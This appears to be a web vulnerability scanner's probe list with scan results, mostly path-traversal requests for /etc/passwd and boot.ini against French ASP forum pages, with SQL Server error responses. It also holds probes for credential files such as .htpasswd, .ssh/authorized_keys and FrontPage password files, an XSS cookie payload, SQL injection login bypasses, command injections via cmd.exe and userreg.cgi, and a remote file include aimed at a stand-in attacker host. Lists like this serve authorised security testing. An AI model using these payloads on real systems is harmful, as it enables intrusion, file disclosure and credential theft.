+forum-ra_professionnel.asp?n=/etc/passwd
+forum-ra_professionnel.asp?n=/etc/passwd%00
+forum-ra_professionnel.asp?n=c:\boot.ini
+forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
+forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
+forum/mainfile.php
+forum/member.php
+forum/newreply.php
+forum/newthread.php
+forum/viewtopic.php
+forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_cu
+forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=1753&amp;nn=%60/etc/passwd%60
+forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd
+forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd
+forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00
+forum1.asp?n=1753&amp;nn=/....../boot.ini
+forum1.asp?n=1753&amp;nn=/..../boot.ini
+forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini
+forum1.asp?n=1753&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini
+forum1.asp?n=1753&amp;nn=/etc/passwd
+forum1.asp?n=1753&amp;nn=/etc/passwd%00
+forum1.asp?n=1753&amp;nn=c:\boot.ini
+forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requi
+forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren
+forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_recor
+forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requeste
+forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec
+forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_reco
+forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\"./.\"./.\"./.\"./.\"./boot.ini
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini
+forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1
+forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
+forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=268
+forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
+forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
+forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=100
+forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
+functions.inc.php+
+get_od_toc.pl
+globals.php3
+globals.pl
+Gozila.cgi
+helperfunction.php
+homebet/homebet.dll?form=menu&amp;option=menu-signin
+htmltonuke.php
+idealbb/error.asp?|-|0|404_Object_Not_Found
+iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found
+imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
+imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
+include/customize.php
+include/help.php
+includes/footer.php3
+includes/header.php3
+index.php?base=test%20
+index.php?IDAdmin=test
+index.php?pymembs=admin
+index.php?SqlQuery=test%20
+index.php?tampon=test%20
+index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20
+infos/contact/index.asp
+infos/faq/index.asp
+infos/gen/index.asp
+infos/services/index.asp
+instaboard/index.cfm
+intranet/browse.php
+invitefriends.php3
+ipchat.php
+ixmail_netattach.php
+jsptest.jsp+
+kernel/class/delete.php
+kernel/classes/ezrole.php
+ldap.search.php3?ldap_serv=nonsense%20
+livredor/index.php
+login.php3?reason=chpass2%20
+mail/include.html
+mail/settings.html
+mail/src/read_body.php
+mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
+mambo/banners.php
+manage/login.asp+
+mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F
+members/ID.pm
+members/ID.xbb
+mod.php
+modif/delete.php
+modif/ident.php
+modif_infos.asp?n=%60/etc/passwd%60
+modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd
+modif_infos.asp?n=../../../../../../../../../etc/passwd%00
+modif_infos.asp?n=/....../boot.ini
+modif_infos.asp?n=/.../.../.../.../.../.../boot.ini
+modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
+modif_infos.asp?n=/../../../../../../../../../etc/passwd
+modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
+modif_infos.asp?n=/etc/passwd
+modif_infos.asp?n=/etc/passwd%00
+modif_infos.asp?n=c:\boot.ini
+modules/Downloads/voteinclude.php+
+modules/Forums/attachment.php
+modules/Search/index.php
+modules/WebChat/in.php+
+modules/WebChat/out.php
+modules/WebChat/quit.php
+modules/WebChat/users.php
+modules/Your_Account/navbar.php+
+moregroupware/modules/webmail2/inc/
+msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
+myguestBk/add1.asp?|-|0|404_Object_Not_Found
+myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
+myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
+netget?sid=Safety&amp;msg=2002&amp;file=Safety
+newtopic.php
+nphp/nphpd.php
+OpenTopic
+options.inc.php+
+oscommerce/default.php
+parse_xml.cgi
+php/gaestebuch/admin/index.php
+php/php4ts.dll
+pks/lookup
+pm/lib.inc.php
+poppassd.php3+
+produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
+productcart/database/EIPC.mdb
+productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
+ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
+product_info.php
+prometheus-all/index.php
+proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\"
+protected/
+protected/secret.html+
+protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;
+protection.php
+pt_config.inc
+pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20
+pvote/del.php?pollorder=1%20
+quikmail/nph-emumail.cgi?type=../%00
+room/save_item.php
+rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
+rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
+screen.php
+scripts/tradecli.dll
+scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
+security/web_access.html
+sendphoto.php
+servers/link.cgi
+setpasswd.cgi
+shop/php_files/site.config.php+
+shop/search.php
+shop/show.php
+shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
+Site/biztalkhttpreceive.dll
+site_searcher.cgi
+spelling.php3+
+squirrelmail/src/read_body.php
+staticpages/index.php
+status.php3
+supporter/index.php
+supporter/tupdate.php
+sw000.asp?|-|0|404_Object_Not_Found
+syslog.htm?%20
+technote/print.cgi
+texis/websearch/phine
+tinymsg.php
+tmp_view.php?file=/etc/passwd
+topic/entete.php
+topsitesdir/edit.php
+ttforum/index.php
+tutos/file/file_new.php
+tutos/file/file_select.php
+typo3/typo3/dev/translations.php
+uifc/MultFileUploadHandler.php+
+url.jsp
+useraction.php3
+userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
+utils/sprc.asp+
+vars.inc+
+VBZooM/add-subject.php
+wbboard/profile.php
+wbboard/reply.php
+webcalendar/login.php
+webcalendar/view_m.php
+webmail/lib/emailreader_execute_on_each_page.inc.php
+webmail/src/read_body.php
+web_app/WEB-INF/webapp.properties
+XMBforum/buddy.php
+XMBforum/member.php
+x_stat_admin.php
+yabbse/Reminder.php
+yabbse/Sources/Packages.php
+zentrack/index.php
+_head.php
+cgi-bin/adduser.cgi
+cgi-bin/amadmin.pl
+cgi-bin/anyboard.cgi
+cgi-bin/AT-generate.cgi
+cgi-bin/auctiondeluxe/auction.pl
+cgi-bin/awl/auctionweaver.pl
+cgi-bin/bb-ack.sh
+cgi-bin/bb-histlog.sh
+cgi-bin/bb-rep.sh
+cgi-bin/bb-replog.sh
+cgi-bin/bbs_forum.cgi
+cgi-bin/build.cgi
+cgi-bin/bulk/bulk.cgi
+cgi-bin/cached_feed.cgi
+cgi-bin/calender_admin.pl
+cgi-bin/cartmanager.cgi
+cgi-bin/cbmc/forums.cgi
+cgi-bin/cgforum.cgi
+cgi-bin/change-your-password.pl
+cgi-bin/clickresponder.pl
+cgi-bin/commandit.cgi
+cgi-bin/counter-ord
+cgi-bin/counterbanner
+cgi-bin/counterbanner-ord
+cgi-bin/counterfiglet-ord
+cgi-bin/counterfiglet/nc/
+cgi-bin/CSMailto.cgi
+cgi-bin/CSMailto/CSMailto.cgi
+cgi-bin/csNews.cgi
+cgi-bin/csPassword.cgi
+cgi-bin/csPassword/csPassword.cgi
+cgi-bin/cutecast/members/
+cgi-bin/day5datanotifier.cgi
+cgi-bin/db2www/library/document.d2w/show
+cgi-bin/db_manager.cgi
+cgi-bin/DCFORMS98.CGI
+cgi-bin/dnewsweb
+cgi-bin/donothing
+cgi-bin/ezshopper2/loadpage.cgi
+cgi-bin/ezshopper3/loadpage.cgi
+cgi-bin/if/admin/nph-build.cgi
+cgi-bin/ikonboard/help.cgi?
+cgi-bin/imageFolio.cgi
+cgi-bin/imagefolio/admin/admin.cgi
+cgi-bin/journal.cgi?folder=journal.cgi%00
+cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
+cgi-bin/majordomo.pl
+cgi-bin/mojo/mojo.cgi
+cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
+cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
+cgi-bin/non-existent.pl
+cgi-bin/nph-exploitscanget.cgi
+cgi-bin/nph-maillist.pl
+cgi-bin/parse-file
+cgi-bin/php-cgi
+cgi-bin/pollssi.cgi
+cgi-bin/postcards.cgi
+cgi-bin/profile.cgi
+cgi-bin/quikstore.cfg
+cgi-bin/register.cgi
+cgi-bin/replicator/webpage.cgi/
+cgi-bin/rightfax/fuwww.dll/?
+cgi-bin/rmp_query
+cgi-bin/robpoll.cgi
+cgi-bin/scripts/*%0a.pl
+cgi-bin/simplestguest.cgi
+cgi-bin/simplestmail.cgi
+cgi-bin/statusconfig.pl
+cgi-bin/sws/manager.pl
+cgi-bin/texis/phine
+cgi-bin/Upload.pl
+cgi-bin/utm/admin
+cgi-bin/utm/utm_stat
+ows-bin/oaskill.exe?abcde.exe
+ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
+cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
+cgi-bin//_vti_pvt/doctodep.btr
+cgi-bin/cfgwiz.exe
+cgi-bin/Cgitest.exe
+cgi-bin/mailform.exe
+cgi-bin/ms_proxy_auth_query/
+cgi-bin/post16.exe
+oem_webstage/oem.conf
+database/
+demo/sql/index.jsp
+cgi-bin/.htaccess
+cgi-bin/.htaccess.old
+cgi-bin/.htaccess.save
+cgi-bin/.htaccess~
+cgi-bin/.htpasswd
+cgi-bin/.passwd
+.wwwacl
+.www_acl
+cgi-bin/.wwwacl
+cgi-bin/.www_acl
+.htpasswd
+.access
+.addressbook
+.bashrc
+.bash_history
+.forward
+.history
+.htaccess
+.lynx_cookies
+.mysql_history
+.passwd
+.pinerc
+.plan
+.proclog
+.procmailrc
+.profile
+.rhosts
+.sh_history
+.ssh
+.ssh/authorized_keys
+.ssh/known_hosts
+cgi-bin/ls
+///../../data/config/microsrv.cfg
+///////../../../../../../etc/passwd
+_vti_bin/shtml.exe/_vti_rpc
+doc/rt/overview-summary.html
+docs/sdb/en/html/index.html
+jservdocs/
+test/jsp/buffer1.jsp
+test/jsp/buffer2.jsp
+test/jsp/buffer3.jsp
+test/jsp/buffer4.jsp
+test/jsp/declaration/IntegerOverflow.jsp
+test/jsp/extends1.jsp
+test/jsp/extends2.jsp
+test/jsp/Language.jsp
+test/jsp/pageAutoFlush.jsp
+test/jsp/pageDouble.jsp
+test/jsp/pageExtends.jsp
+test/jsp/pageImport2.jsp
+test/jsp/pageInfo.jsp
+test/jsp/pageInvalid.jsp
+test/jsp/pageIsErrorPage.jsp
+test/jsp/pageIsThreadSafe.jsp
+test/jsp/pageSession.jsp
+test/realPath.jsp
+tomcat-docs/index.html
+cgi-bin/test-cgi.bat
+akopia/
+bc4j.html
+dms0
+jspdocs/
+mod_ose_docs
+ojspdemos/basic/hellouser/hellouser.jsp
+ojspdemos/basic/simple/usebean.jsp
+ojspdemos/basic/simple/welcomeuser.jsp
+oprocmgr-status
+php/index.php
+pls/portal30/admin_/
+pls/simpledad/admin_/
+pls/simpledad/admin_/gateway.htm?schema=sample
+pls/simpledad/admin_/globalsettings.htm
+search/
+servlet/Counter
+servlet/DateServlet
+servlet/FingerServlet
+servlet/HelloWorldServlet
+servlet/IsItWorking
+servlet/SessionServlet
+servlet/SimpleServlet
+servlet/SnoopServlet
+xdk/
+xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
+admcgi/contents.htm
+admcgi/scripts/Fpadmcgi.exe
+admisapi/fpadmin.htm
+bin/admin.pl
+bin/cfgwiz.exe
+bin/CGImail.exe
+bin/contents.htm
+bin/fpadmin.htm
+bin/fpremadm.exe
+bin/fpsrvadm.exe
+cgi-bin/CGImail.exe
+cgi-bin/contents.htm
+cgi-bin/fpadmin.htm
+cgi-bin/fpremadm.exe
+scripts/admin.pl
+scripts/cfgwiz.exe
+scripts/CGImail.exe
+scripts/contents.htm
+scripts/fpadmin.htm
+scripts/fpcount.exe
+scripts/fpremadm.exe
+scripts/fpsrvadm.exe
+_private/
+_private/orders.htm
+_private/orders.txt
+_private/register.htm
+_private/register.txt
+_private/registrations.htm
+_private/registrations.txt
+_private/_vti_cnf/
+_vti_bin/
+_vti_bin/admin.pl
+_vti_bin/cfgwiz.exe
+_vti_bin/CGImail.exe
+_vti_bin/contents.htm
+_vti_bin/fpadmin.htm
+_vti_bin/fpremadm.exe
+_vti_bin/fpsrvadm.exe
+_vti_bin/_vti_cnf/
+_vti_cnf/_vti_cnf/
+_vti_inf.html
+_vti_log/_vti_cnf/
+_vti_pvt/administrators.pwd
+_vti_pvt/authors.pwd
+_vti_pvt/service.pwd
+_vti_pvt/users.pwd
+manual/servlets/scripts/servlet1/servform.htm
+manual/servlets/scripts/shoes/shoeform.htm
+examples/
+examples/context
+examples/forward1
+examples/forward2
+examples/header
+examples/include1
+examples/info
+examples/jsp/index.html
+help/contents.htm
+help/home.html
+manual/ag/esperfrm.htm
+nethome/
+com/novell/gwmonitor/help/en/default.htm
+com/novell/webaccess/help/en/default.htm
